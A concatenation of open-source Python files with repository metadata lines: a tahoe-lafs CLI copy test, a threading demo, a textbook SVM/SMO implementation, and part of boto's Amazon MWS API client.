if err == "cannot copy directories without --recursive":
return set(["E4-NEED-R"])
if err == "cannot copy directory into a file":
return set(["E5-DIRTOFILE"])
if err == "copying multiple things requires target be a directory":
return set(["E6-MANYONE"])
if err == "target is not a directory, but ends with a slash":
return set(["E7-BADSLASH"])
if (err.startswith("source ") and
"is not a directory, but ends with a slash" in err):
return set(["E8-BADSLASH"])
if err == "cannot copy multiple files with the same name into the same target directory":
return set(["E9-COLLIDING-TARGETS"])
self.fail("unrecognized error ('%s') %s" % (case, res))
d.addCallback(_check)
return d
def do_one_test(self, case, orig_expected):
expected = set(orig_expected)
printable_expected = ",".join(sorted(expected))
#print "---", case, ":", printable_expected
for f in orig_expected:
# f is "dir/file" or "dir/sub/file" or "dir/" or "dir/sub/"
# we want all parent directories in the set, with trailing /
pieces = f.rstrip("/").split("/")
for i in range(1,len(pieces)):
parent = "/".join(pieces[:i])
expected.add(parent+"/")
d = self.run_one_case(case)
def _dump(got):
ok = "ok" if got == expected else "FAIL"
printable_got = ",".join(sorted(got))
print "%-31s: got %-19s, want %-19s %s" % (case, printable_got,
printable_expected, ok)
return got
#d.addCallback(_dump)
def _check(got):
self.failUnlessEqual(got, expected, case)
d.addCallback(_check)
return d
def do_tests(self):
# then we run various forms of "cp [-r] TAHOETHING to[/missing]"
# and see what happens.
d = defer.succeed(None)
#print
for line in COPYOUT_TESTCASES.splitlines():
if "#" in line:
line = line[:line.find("#")]
line = line.strip()
if not line:
continue
case, expected = line.split(":")
case = case.strip()
expected = frozenset(expected.strip().split(","))
d.addCallback(lambda ign, case=case, expected=expected:
self.do_one_test(case, expected))
return d
def test_cp_out(self):
# test copying all sorts of things out of a tahoe filesystem
self.basedir = "cli_cp/CopyOut/cp_out"
self.set_up_grid(num_servers=1)
d = self.do_setup()
d.addCallback(lambda ign: self.do_tests())
return d
| gsb-eng/tahoe-lafs | src/allmydata/test/test_cli_cp.py | Python | gpl-2.0 | 44,518 |
from threading import Thread #threading module should be imported
def tryit1():
name=input("Enter your name")
print("Hi your name is ",name)
def tryit2():
for i in range(1,1000000):
x=i*2.0
print("Done")
thread1=Thread(target=tryit1) #we are creating one thread for tryit1
thread1.start() #we are starting that thread
thread2=Thread(target=tryit2) #we are creating one thread for tryit2
thread2.start() #we are starting that thread
#we are waiting for the threads to complete using join.
thread1.join()
thread2.join() | pk-python/basics | basics/concurrency.py | Python | mit | 580 |
from numpy import *
from time import sleep
def loadDataSet(fileName):
dataMat = []; labelMat = []
fr = open(fileName)
for line in fr.readlines():
lineArr = line.strip().split('\t')
dataMat.append([float(lineArr[0]), float(lineArr[1])])
labelMat.append(float(lineArr[2]))
return dataMat,labelMat
def selectJrand(i,m):
j=i #we want to select any J not equal to i
while (j==i):
j = int(random.uniform(0,m))
return j
def clipAlpha(aj,H,L):
if aj > H:
aj = H
if L > aj:
aj = L
return aj
def smoSimple(dataMatIn, classLabels, C, toler, maxIter):
dataMatrix = mat(dataMatIn); labelMat = mat(classLabels).transpose()
b = 0; m,n = shape(dataMatrix)
alphas = mat(zeros((m,1)))
iter = 0
while (iter < maxIter):
alphaPairsChanged = 0
for i in range(m):
fXi = float(multiply(alphas,labelMat).T*(dataMatrix*dataMatrix[i,:].T)) + b
Ei = fXi - float(labelMat[i])#if checks if an example violates KKT conditions
if ((labelMat[i]*Ei < -toler) and (alphas[i] < C)) or ((labelMat[i]*Ei > toler) and (alphas[i] > 0)):
j = selectJrand(i,m)
fXj = float(multiply(alphas,labelMat).T*(dataMatrix*dataMatrix[j,:].T)) + b
Ej = fXj - float(labelMat[j])
alphaIold = alphas[i].copy(); alphaJold = alphas[j].copy()
if (labelMat[i] != labelMat[j]):
L = max(0, alphas[j] - alphas[i])
H = min(C, C + alphas[j] - alphas[i])
else:
L = max(0, alphas[j] + alphas[i] - C)
H = min(C, alphas[j] + alphas[i])
if L==H: print("L==H"); continue
eta = 2.0 * dataMatrix[i,:]*dataMatrix[j,:].T - dataMatrix[i,:]*dataMatrix[i,:].T - dataMatrix[j,:]*dataMatrix[j,:].T
if eta >= 0: print("eta>=0"); continue
alphas[j] -= labelMat[j]*(Ei - Ej)/eta
alphas[j] = clipAlpha(alphas[j],H,L)
if (abs(alphas[j] - alphaJold) < 0.00001): print("j not moving enough"); continue
alphas[i] += labelMat[j]*labelMat[i]*(alphaJold - alphas[j])#update i by the same amount as j
#the update is in the oppostie direction
b1 = b - Ei- labelMat[i]*(alphas[i]-alphaIold)*dataMatrix[i,:]*dataMatrix[i,:].T - labelMat[j]*(alphas[j]-alphaJold)*dataMatrix[i,:]*dataMatrix[j,:].T
b2 = b - Ej- labelMat[i]*(alphas[i]-alphaIold)*dataMatrix[i,:]*dataMatrix[j,:].T - labelMat[j]*(alphas[j]-alphaJold)*dataMatrix[j,:]*dataMatrix[j,:].T
if (0 < alphas[i]) and (C > alphas[i]): b = b1
elif (0 < alphas[j]) and (C > alphas[j]): b = b2
else: b = (b1 + b2)/2.0
alphaPairsChanged += 1
print("iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
if (alphaPairsChanged == 0): iter += 1
else: iter = 0
print("iteration number: %d" % iter)
return b,alphas
def kernelTrans(X, A, kTup): #calc the kernel or transform data to a higher dimensional space
m,n = shape(X)
K = mat(zeros((m,1)))
if kTup[0]=='lin': K = X * A.T #linear kernel
elif kTup[0]=='rbf':
for j in range(m):
deltaRow = X[j,:] - A
K[j] = deltaRow*deltaRow.T
K = exp(K/(-1*kTup[1]**2)) #divide in NumPy is element-wise not matrix like Matlab
else: raise NameError('Houston We Have a Problem -- \
That Kernel is not recognized')
return K
class optStruct:
def __init__(self,dataMatIn, classLabels, C, toler, kTup): # Initialize the structure with the parameters
self.X = dataMatIn
self.labelMat = classLabels
self.C = C
self.tol = toler
self.m = shape(dataMatIn)[0]
self.alphas = mat(zeros((self.m,1)))
self.b = 0
self.eCache = mat(zeros((self.m,2))) #first column is valid flag
self.K = mat(zeros((self.m,self.m)))
for i in range(self.m):
self.K[:,i] = kernelTrans(self.X, self.X[i,:], kTup)
def calcEk(oS, k):
fXk = float(multiply(oS.alphas,oS.labelMat).T*oS.K[:,k] + oS.b)
Ek = fXk - float(oS.labelMat[k])
return Ek
def selectJ(i, oS, Ei): #this is the second choice -heurstic, and calcs Ej
maxK = -1; maxDeltaE = 0; Ej = 0
oS.eCache[i] = [1,Ei] #set valid #choose the alpha that gives the maximum delta E
validEcacheList = nonzero(oS.eCache[:,0].A)[0]
if (len(validEcacheList)) > 1:
for k in validEcacheList: #loop through valid Ecache values and find the one that maximizes delta E
if k == i: continue #don't calc for i, waste of time
Ek = calcEk(oS, k)
deltaE = abs(Ei - Ek)
if (deltaE > maxDeltaE):
maxK = k; maxDeltaE = deltaE; Ej = Ek
return maxK, Ej
else: #in this case (first time around) we don't have any valid eCache values
j = selectJrand(i, oS.m)
Ej = calcEk(oS, j)
return j, Ej
def updateEk(oS, k):#after any alpha has changed update the new value in the cache
Ek = calcEk(oS, k)
oS.eCache[k] = [1,Ek]
def innerL(i, oS):
Ei = calcEk(oS, i)
if ((oS.labelMat[i]*Ei < -oS.tol) and (oS.alphas[i] < oS.C)) or ((oS.labelMat[i]*Ei > oS.tol) and (oS.alphas[i] > 0)):
j,Ej = selectJ(i, oS, Ei) #this has been changed from selectJrand
alphaIold = oS.alphas[i].copy(); alphaJold = oS.alphas[j].copy();
if (oS.labelMat[i] != oS.labelMat[j]):
L = max(0, oS.alphas[j] - oS.alphas[i])
H = min(oS.C, oS.C + oS.alphas[j] - oS.alphas[i])
else:
L = max(0, oS.alphas[j] + oS.alphas[i] - oS.C)
H = min(oS.C, oS.alphas[j] + oS.alphas[i])
if L==H: print("L==H"); return 0
eta = 2.0 * oS.K[i,j] - oS.K[i,i] - oS.K[j,j] #changed for kernel
if eta >= 0: print("eta>=0"); return 0
oS.alphas[j] -= oS.labelMat[j]*(Ei - Ej)/eta
oS.alphas[j] = clipAlpha(oS.alphas[j],H,L)
updateEk(oS, j) #added this for the Ecache
if (abs(oS.alphas[j] - alphaJold) < 0.00001): print("j not moving enough"); return 0
oS.alphas[i] += oS.labelMat[j]*oS.labelMat[i]*(alphaJold - oS.alphas[j])#update i by the same amount as j
updateEk(oS, i) #added this for the Ecache #the update is in the oppostie direction
b1 = oS.b - Ei- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.K[i,i] - oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.K[i,j]
b2 = oS.b - Ej- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.K[i,j]- oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.K[j,j]
if (0 < oS.alphas[i]) and (oS.C > oS.alphas[i]): oS.b = b1
elif (0 < oS.alphas[j]) and (oS.C > oS.alphas[j]): oS.b = b2
else: oS.b = (b1 + b2)/2.0
return 1
else: return 0
def smoP(dataMatIn, classLabels, C, toler, maxIter,kTup=('lin', 0)): #full Platt SMO
oS = optStruct(mat(dataMatIn),mat(classLabels).transpose(),C,toler, kTup)
iter = 0
entireSet = True; alphaPairsChanged = 0
while (iter < maxIter) and ((alphaPairsChanged > 0) or (entireSet)):
alphaPairsChanged = 0
if entireSet: #go over all
for i in range(oS.m):
alphaPairsChanged += innerL(i,oS)
print("fullSet, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
iter += 1
else:#go over non-bound (railed) alphas
nonBoundIs = nonzero((oS.alphas.A > 0) * (oS.alphas.A < C))[0]
for i in nonBoundIs:
alphaPairsChanged += innerL(i,oS)
print("non-bound, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
iter += 1
if entireSet: entireSet = False #toggle entire set loop
elif (alphaPairsChanged == 0): entireSet = True
print("iteration number: %d" % iter)
return oS.b,oS.alphas
def calcWs(alphas,dataArr,classLabels):
X = mat(dataArr); labelMat = mat(classLabels).transpose()
m,n = shape(X)
w = zeros((n,1))
for i in range(m):
w += multiply(alphas[i]*labelMat[i],X[i,:].T)
return w
def testRbf(k1=1.3):
dataArr,labelArr = loadDataSet('testSetRBF.txt')
b,alphas = smoP(dataArr, labelArr, 200, 0.0001, 10000, ('rbf', k1)) #C=200 important
datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
svInd=nonzero(alphas.A>0)[0]
sVs=datMat[svInd] #get matrix of only support vectors
labelSV = labelMat[svInd];
print("there are %d Support Vectors" % shape(sVs)[0])
m,n = shape(datMat)
errorCount = 0
for i in range(m):
kernelEval = kernelTrans(sVs,datMat[i,:],('rbf', k1))
predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
if sign(predict)!=sign(labelArr[i]): errorCount += 1
print("the training error rate is: %f" % (float(errorCount)/m))
dataArr,labelArr = loadDataSet('testSetRBF2.txt')
errorCount = 0
datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
m,n = shape(datMat)
for i in range(m):
kernelEval = kernelTrans(sVs,datMat[i,:],('rbf', k1))
predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
if sign(predict)!=sign(labelArr[i]): errorCount += 1
print("the test error rate is: %f" % (float(errorCount)/m))
def img2vector(filename):
returnVect = zeros((1,1024))
fr = open(filename)
for i in range(32):
lineStr = fr.readline()
for j in range(32):
returnVect[0,32*i+j] = int(lineStr[j])
return returnVect
def loadImages(dirName):
from os import listdir
hwLabels = []
trainingFileList = listdir(dirName) #load the training set
m = len(trainingFileList)
trainingMat = zeros((m,1024))
for i in range(m):
fileNameStr = trainingFileList[i]
fileStr = fileNameStr.split('.')[0] #take off .txt
classNumStr = int(fileStr.split("_")[0])
if classNumStr == 9: hwLabels.append(-1)
else: hwLabels.append(1)
trainingMat[i,:] = img2vector('%s/%s' % (dirName, fileNameStr))
return trainingMat, hwLabels
def testDigits(kTup=('rbf', 10)):
dataArr,labelArr = loadImages('trainingDigits')
b,alphas = smoP(dataArr, labelArr, 200, 0.0001, 10000, kTup)
datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
svInd=nonzero(alphas.A>0)[0]
sVs=datMat[svInd]
labelSV = labelMat[svInd];
print("there are %d Support Vectors" % shape(sVs)[0])
m,n = shape(datMat)
errorCount = 0
for i in range(m):
kernelEval = kernelTrans(sVs,datMat[i,:],kTup)
predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
if sign(predict)!=sign(labelArr[i]): errorCount += 1
print("the training error rate is: %f" % (float(errorCount)/m))
dataArr,labelArr = loadImages('testDigits')
errorCount = 0
datMat=mat(dataArr); labelMat = mat(labelArr).transpose()
m,n = shape(datMat)
for i in range(m):
kernelEval = kernelTrans(sVs,datMat[i,:],kTup)
predict=kernelEval.T * multiply(labelSV,alphas[svInd]) + b
if sign(predict)!=sign(labelArr[i]): errorCount += 1
print("the test error rate is: %f" % (float(errorCount)/m))
#######********************************
#Non-Kernel Versions below
#######********************************
class optStructK:
def __init__(self,dataMatIn, classLabels, C, toler): # Initialize the structure with the parameters
self.X = dataMatIn
self.labelMat = classLabels
self.C = C
self.tol = toler
self.m = shape(dataMatIn)[0]
self.alphas = mat(zeros((self.m,1)))
self.b = 0
self.eCache = mat(zeros((self.m,2))) #first column is valid flag
def calcEkK(oS, k):
fXk = float(multiply(oS.alphas,oS.labelMat).T*(oS.X*oS.X[k,:].T)) + oS.b
Ek = fXk - float(oS.labelMat[k])
return Ek
def selectJK(i, oS, Ei): #this is the second choice -heurstic, and calcs Ej
maxK = -1; maxDeltaE = 0; Ej = 0
oS.eCache[i] = [1,Ei] #set valid #choose the alpha that gives the maximum delta E
validEcacheList = nonzero(oS.eCache[:,0].A)[0]
if (len(validEcacheList)) > 1:
for k in validEcacheList: #loop through valid Ecache values and find the one that maximizes delta E
if k == i: continue #don't calc for i, waste of time
Ek = calcEk(oS, k)
deltaE = abs(Ei - Ek)
if (deltaE > maxDeltaE):
maxK = k; maxDeltaE = deltaE; Ej = Ek
return maxK, Ej
else: #in this case (first time around) we don't have any valid eCache values
j = selectJrand(i, oS.m)
Ej = calcEk(oS, j)
return j, Ej
def updateEkK(oS, k):#after any alpha has changed update the new value in the cache
Ek = calcEk(oS, k)
oS.eCache[k] = [1,Ek]
def innerLK(i, oS):
Ei = calcEk(oS, i)
if ((oS.labelMat[i]*Ei < -oS.tol) and (oS.alphas[i] < oS.C)) or ((oS.labelMat[i]*Ei > oS.tol) and (oS.alphas[i] > 0)):
j,Ej = selectJ(i, oS, Ei) #this has been changed from selectJrand
alphaIold = oS.alphas[i].copy(); alphaJold = oS.alphas[j].copy();
if (oS.labelMat[i] != oS.labelMat[j]):
L = max(0, oS.alphas[j] - oS.alphas[i])
H = min(oS.C, oS.C + oS.alphas[j] - oS.alphas[i])
else:
L = max(0, oS.alphas[j] + oS.alphas[i] - oS.C)
H = min(oS.C, oS.alphas[j] + oS.alphas[i])
if L==H: print("L==H"); return 0
eta = 2.0 * oS.X[i,:]*oS.X[j,:].T - oS.X[i,:]*oS.X[i,:].T - oS.X[j,:]*oS.X[j,:].T
if eta >= 0: print("eta>=0"); return 0
oS.alphas[j] -= oS.labelMat[j]*(Ei - Ej)/eta
oS.alphas[j] = clipAlpha(oS.alphas[j],H,L)
updateEk(oS, j) #added this for the Ecache
if (abs(oS.alphas[j] - alphaJold) < 0.00001): print("j not moving enough"); return 0
oS.alphas[i] += oS.labelMat[j]*oS.labelMat[i]*(alphaJold - oS.alphas[j])#update i by the same amount as j
updateEk(oS, i) #added this for the Ecache #the update is in the oppostie direction
b1 = oS.b - Ei- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.X[i,:]*oS.X[i,:].T - oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.X[i,:]*oS.X[j,:].T
b2 = oS.b - Ej- oS.labelMat[i]*(oS.alphas[i]-alphaIold)*oS.X[i,:]*oS.X[j,:].T - oS.labelMat[j]*(oS.alphas[j]-alphaJold)*oS.X[j,:]*oS.X[j,:].T
if (0 < oS.alphas[i]) and (oS.C > oS.alphas[i]): oS.b = b1
elif (0 < oS.alphas[j]) and (oS.C > oS.alphas[j]): oS.b = b2
else: oS.b = (b1 + b2)/2.0
return 1
else: return 0
def smoPK(dataMatIn, classLabels, C, toler, maxIter): #full Platt SMO
oS = optStruct(mat(dataMatIn),mat(classLabels).transpose(),C,toler)
iter = 0
entireSet = True; alphaPairsChanged = 0
while (iter < maxIter) and ((alphaPairsChanged > 0) or (entireSet)):
alphaPairsChanged = 0
if entireSet: #go over all
for i in range(oS.m):
alphaPairsChanged += innerL(i,oS)
print("fullSet, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
iter += 1
else:#go over non-bound (railed) alphas
nonBoundIs = nonzero((oS.alphas.A > 0) * (oS.alphas.A < C))[0]
for i in nonBoundIs:
alphaPairsChanged += innerL(i,oS)
print("non-bound, iter: %d i:%d, pairs changed %d" % (iter,i,alphaPairsChanged))
iter += 1
if entireSet: entireSet = False #toggle entire set loop
elif (alphaPairsChanged == 0): entireSet = True
print("iteration number: %d" % iter)
return oS.b,oS.alphas | huaj1101/ML-PY | ML_IN_ACTION/C6/svmMLiA.py | Python | apache-2.0 | 15,888 |
# Copyright (c) 2012-2014 Andy Davidoff http://www.disruptek.com/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import hashlib
import string
import collections
from boto.connection import AWSQueryConnection
from boto.exception import BotoServerError
import boto.mws.exception
import boto.mws.response
from boto.handler import XmlHandler
from boto.compat import filter, map, six, encodebytes
__all__ = ['MWSConnection']
api_version_path = {
'Feeds': ('2009-01-01', 'Merchant', '/'),
'Reports': ('2009-01-01', 'Merchant', '/'),
'Orders': ('2013-09-01', 'SellerId', '/Orders/2013-09-01'),
'Products': ('2011-10-01', 'SellerId', '/Products/2011-10-01'),
'Sellers': ('2011-07-01', 'SellerId', '/Sellers/2011-07-01'),
'Inbound': ('2010-10-01', 'SellerId',
'/FulfillmentInboundShipment/2010-10-01'),
'Outbound': ('2010-10-01', 'SellerId',
'/FulfillmentOutboundShipment/2010-10-01'),
'Inventory': ('2010-10-01', 'SellerId',
'/FulfillmentInventory/2010-10-01'),
'Recommendations': ('2013-04-01', 'SellerId',
'/Recommendations/2013-04-01'),
'CustomerInfo': ('2014-03-01', 'SellerId',
'/CustomerInformation/2014-03-01'),
'CartInfo': ('2014-03-01', 'SellerId',
'/CartInformation/2014-03-01'),
'Subscriptions': ('2013-07-01', 'SellerId',
'/Subscriptions/2013-07-01'),
'OffAmazonPayments': ('2013-01-01', 'SellerId',
'/OffAmazonPayments/2013-01-01'),
}
content_md5 = lambda c: encodebytes(hashlib.md5(c).digest()).strip()
decorated_attrs = ('action', 'response', 'section',
'quota', 'restore', 'version')
api_call_map = {}
def add_attrs_from(func, to):
for attr in decorated_attrs:
setattr(to, attr, getattr(func, attr, None))
to.__wrapped__ = func
return to
def structured_lists(*fields):
def decorator(func):
def wrapper(self, *args, **kw):
for key, acc in [f.split('.') for f in fields]:
if key in kw:
newkey = key + '.' + acc + (acc and '.' or '')
for i in range(len(kw[key])):
kw[newkey + str(i + 1)] = kw[key][i]
kw.pop(key)
return func(self, *args, **kw)
wrapper.__doc__ = "{0}\nLists: {1}".format(func.__doc__,
', '.join(fields))
return add_attrs_from(func, to=wrapper)
return decorator
def http_body(field):
def decorator(func):
def wrapper(*args, **kw):
if any([f not in kw for f in (field, 'content_type')]):
message = "{0} requires {1} and content_type arguments for " \
"building HTTP body".format(func.action, field)
raise KeyError(message)
kw['body'] = kw.pop(field)
kw['headers'] = {
'Content-Type': kw.pop('content_type'),
'Content-MD5': content_md5(kw['body']),
}
return func(*args, **kw)
wrapper.__doc__ = "{0}\nRequired HTTP Body: " \
"{1}".format(func.__doc__, field)
return add_attrs_from(func, to=wrapper)
return decorator
def destructure_object(value, into, prefix, members=False):
if isinstance(value, boto.mws.response.ResponseElement):
destructure_object(value.__dict__, into, prefix, members=members)
elif isinstance(value, collections.Mapping):
for name in value:
if name.startswith('_'):
continue
destructure_object(value[name], into, prefix + '.' + name,
members=members)
elif isinstance(value, six.string_types):
into[prefix] = value
elif isinstance(value, collections.Iterable):
for index, element in enumerate(value):
suffix = (members and '.member.' or '.') + str(index + 1)
destructure_object(element, into, prefix + suffix,
members=members)
elif isinstance(value, bool):
into[prefix] = str(value).lower()
else:
into[prefix] = value
def structured_objects(*fields, **kwargs):
def decorator(func):
def wrapper(*args, **kw):
members = kwargs.get('members', False)
for field in filter(lambda i: i in kw, fields):
destructure_object(kw.pop(field), kw, field, members=members)
return func(*args, **kw)
wrapper.__doc__ = "{0}\nElement|Iter|Map: {1}\n" \
"(ResponseElement or anything iterable/dict-like)" \
.format(func.__doc__, ', '.join(fields))
return add_attrs_from(func, to=wrapper)
return decorator
def requires(*groups):
def decorator(func):
def requires(*args, **kw):
hasgroup = lambda group: all(key in kw for key in group)
if 1 != len(list(filter(hasgroup, groups))):
message = ' OR '.join(['+'.join(g) for g in groups])
message = "{0} requires {1} argument(s)" \
"".format(func.action, message)
raise KeyError(message)
return func(*args, **kw)
message = ' OR '.join(['+'.join(g) for g in groups])
requires.__doc__ = "{0}\nRequired: {1}".format(func.__doc__,
message)
return add_attrs_from(func, to=requires)
return decorator
def exclusive(*groups):
def decorator(func):
def wrapper(*args, **kw):
hasgroup = lambda group: all(key in kw for key in group)
if len(list(filter(hasgroup, groups))) not in (0, 1):
message = ' OR '.join(['+'.join(g) for g in groups])
message = "{0} requires either {1}" \
"".format(func.action, message)
raise KeyError(message)
return func(*args, **kw)
message = ' OR '.join(['+'.join(g) for g in groups])
wrapper.__doc__ = "{0}\nEither: {1}".format(func.__doc__,
message)
return add_attrs_from(func, to=wrapper)
return decorator
def dependent(field, *groups):
def decorator(func):
def wrapper(*args, **kw):
hasgroup = lambda group: all(key in kw for key in group)
if field in kw and not any(hasgroup(g) for g in groups):
message = ' OR '.join(['+'.join(g) for g in groups])
message = "{0} argument {1} requires {2}" \
"".format(func.action, field, message)
raise KeyError(message)
return func(*args, **kw)
message = ' OR '.join(['+'.join(g) for g in groups])
wrapper.__doc__ = "{0}\n{1} requires: {2}".format(func.__doc__,
field,
message)
return add_attrs_from(func, to=wrapper)
return decorator
def requires_some_of(*fields):
def decorator(func):
def requires(*args, **kw):
if not any(i in kw for i in fields):
message = "{0} requires at least one of {1} argument(s)" \
"".format(func.action, ', '.join(fields))
raise KeyError(message)
return func(*args, **kw)
requires.__doc__ = "{0}\nSome Required: {1}".format(func.__doc__,
', '.join(fields))
return add_attrs_from(func, to=requires)
return decorator
def boolean_arguments(*fields):
def decorator(func):
def wrapper(*args, **kw):
for field in [f for f in fields if isinstance(kw.get(f), bool)]:
kw[field] = str(kw[field]).lower()
return func(*args, **kw)
wrapper.__doc__ = "{0}\nBooleans: {1}".format(func.__doc__,
', '.join(fields))
return add_attrs_from(func, to=wrapper)
return decorator
def api_action(section, quota, restore, *api):
def decorator(func, quota=int(quota), restore=float(restore)):
version, accesskey, path = api_version_path[section]
action = ''.join(api or map(str.capitalize, func.__name__.split('_')))
def wrapper(self, *args, **kw):
kw.setdefault(accesskey, getattr(self, accesskey, None))
if kw[accesskey] is None:
message = "{0} requires {1} argument. Set the " \
"MWSConnection.{2} attribute?" \
"".format(action, accesskey, accesskey)
raise KeyError(message)
kw['Action'] = action
kw['Version'] = version
response = self._response_factory(action, connection=self)
request = dict(path=path, quota=quota, restore=restore)
return func(self, request, response, *args, **kw)
for attr in decorated_attrs:
setattr(wrapper, attr, locals().get(attr))
wrapper.__doc__ = "MWS {0}/{1} API call; quota={2} restore={3:.2f}\n" \
"{4}".format(action, version, quota, restore,
func.__doc__)
api_call_map[action] = func.__name__
return wrapper
return decorator
class MWSConnection(AWSQueryConnection):
ResponseFactory = boto.mws.response.ResponseFactory
ResponseErrorFactory = boto.mws.exception.ResponseErrorFactory
def __init__(self, *args, **kw):
kw.setdefault('host', 'mws.amazonservices.com')
self._sandboxed = kw.pop('sandbox', False)
self.Merchant = kw.pop('Merchant', None) or kw.get('SellerId')
self.SellerId = kw.pop('SellerId', None) or self.Merchant
kw = self._setup_factories(kw.pop('factory_scopes', []), **kw)
super(MWSConnection, self).__init__(*args, **kw)
def _setup_factories(self, extrascopes, **kw):
for factory, (scope, Default) in {
'response_factory':
(boto.mws.response, self.ResponseFactory),
'response_error_factory':
(boto.mws.exception, self.ResponseErrorFactory),
}.items():
if factory in kw:
setattr(self, '_' + factory, kw.pop(factory))
else:
scopes = extrascopes + [scope]
setattr(self, '_' + factory, Default(scopes=scopes))
return kw
def _sandboxify(self, path):
if not self._sandboxed:
return path
splat = path.split('/')
splat[-2] += '_Sandbox'
return splat.join('/')
def _required_auth_capability(self):
return ['mws']
def _post_request(self, request, params, parser, body='', headers=None):
"""Make a POST request, optionally with a content body,
and return the response, optionally as raw text.
"""
headers = headers or {}
path = self._sandboxify(request['path'])
request = self.build_base_http_request('POST', path, None, data=body,
params=params, headers=headers,
host=self.host)
try:
response = self._mexe(request, override_num_retries=None)
except BotoServerError as bs:
raise self._response_error_factor(bs.status, bs.reason, bs.body)
body = response.read()
boto.log.debug(body)
if not body:
boto.log.error('Null body %s' % body)
raise self._response_error_factory(response.status,
response.reason, body)
if response.status != 200:
boto.log.error('%s %s' % (response.status, response.reason))
boto.log.error('%s' % body)
raise self._response_error_factory(response.status,
response.reason, body)
digest = response.getheader('Content-MD5')
if digest is not None:
assert content_md5(body) == digest
contenttype = response.getheader('Content-Type')
return self._parse_response(parser, contenttype, body)
def _parse_response(self, parser, contenttype, body):
if not contenttype.startswith('text/xml'):
return body
handler = XmlHandler(parser, self)
xml.sax.parseString(body, handler)
return parser
def method_for(self, name):
"""Return the MWS API method referred to in the argument.
The named method can be in CamelCase or underlined_lower_case.
This is the complement to MWSConnection.any_call.action
"""
action = '_' in name and string.capwords(name, '_') or name
if action in api_call_map:
return getattr(self, api_call_map[action])
return None
def iter_call(self, call, *args, **kw):
"""Pass a call name as the first argument and a generator
is returned for the initial response and any continuation
call responses made using the NextToken.
"""
method = self.method_for(call)
assert method, 'No call named "{0}"'.format(call)
return self.iter_response(method(*args, **kw))
def iter_response(self, response):
"""Pass a call's response as the initial argument and a
generator is returned for the initial response and any
continuation call responses made using the NextToken.
"""
yield response
more = self.method_for(response._action + 'ByNextToken')
while more and response._result.HasNext == 'true':
response = more(NextToken=response._result.NextToken)
yield response
@requires(['FeedType'])
@boolean_arguments('PurgeAndReplace')
@http_body('FeedContent')
@structured_lists('MarketplaceIdList.Id')
@api_action('Feeds', 15, 120)
def submit_feed(self, request, response, headers=None, body='', **kw):
"""Uploads a feed for processing by Amazon MWS.
"""
headers = headers or {}
return self._post_request(request, kw, response, body=body,
headers=headers)
@structured_lists('FeedSubmissionIdList.Id', 'FeedTypeList.Type',
'FeedProcessingStatusList.Status')
@api_action('Feeds', 10, 45)
def get_feed_submission_list(self, request, response, **kw):
"""Returns a list of all feed submissions submitted in the
previous 90 days.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Feeds', 0, 0)
def get_feed_submission_list_by_next_token(self, request, response, **kw):
"""Returns a list of feed submissions using the NextToken parameter.
"""
return self._post_request(request, kw, response)
@structured_lists('FeedTypeList.Type', 'FeedProcessingStatusList.Status')
@api_action('Feeds', 10, 45)
def get_feed_submission_count(self, request, response, **kw):
"""Returns a count of the feeds submitted in the previous 90 days.
"""
return self._post_request(request, kw, response)
@structured_lists('FeedSubmissionIdList.Id', 'FeedTypeList.Type')
@api_action('Feeds', 10, 45)
def cancel_feed_submissions(self, request, response, **kw):
"""Cancels one or more feed submissions and returns a
count of the feed submissions that were canceled.
"""
return self._post_request(request, kw, response)
@requires(['FeedSubmissionId'])
@api_action('Feeds', 15, 60)
def get_feed_submission_result(self, request, response, **kw):
"""Returns the feed processing report.
"""
return self._post_request(request, kw, response)
def get_service_status(self, **kw):
"""Instruct the user on how to get service status.
"""
sections = ', '.join(map(str.lower, api_version_path.keys()))
message = "Use {0}.get_(section)_service_status(), " \
"where (section) is one of the following: " \
"{1}".format(self.__class__.__name__, sections)
raise AttributeError(message)
@requires(['ReportType'])
@structured_lists('MarketplaceIdList.Id')
@boolean_arguments('ReportOptions=ShowSalesChannel')
@api_action('Reports', 15, 60)
def request_report(self, request, response, **kw):
"""Creates a report request and submits the request to Amazon MWS.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportRequestIdList.Id', 'ReportTypeList.Type',
'ReportProcessingStatusList.Status')
@api_action('Reports', 10, 45)
def get_report_request_list(self, request, response, **kw):
"""Returns a list of report requests that you can use to get the
ReportRequestId for a report.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Reports', 0, 0)
def get_report_request_list_by_next_token(self, request, response, **kw):
"""Returns a list of report requests using the NextToken,
which was supplied by a previous request to either
GetReportRequestListByNextToken or GetReportRequestList, where
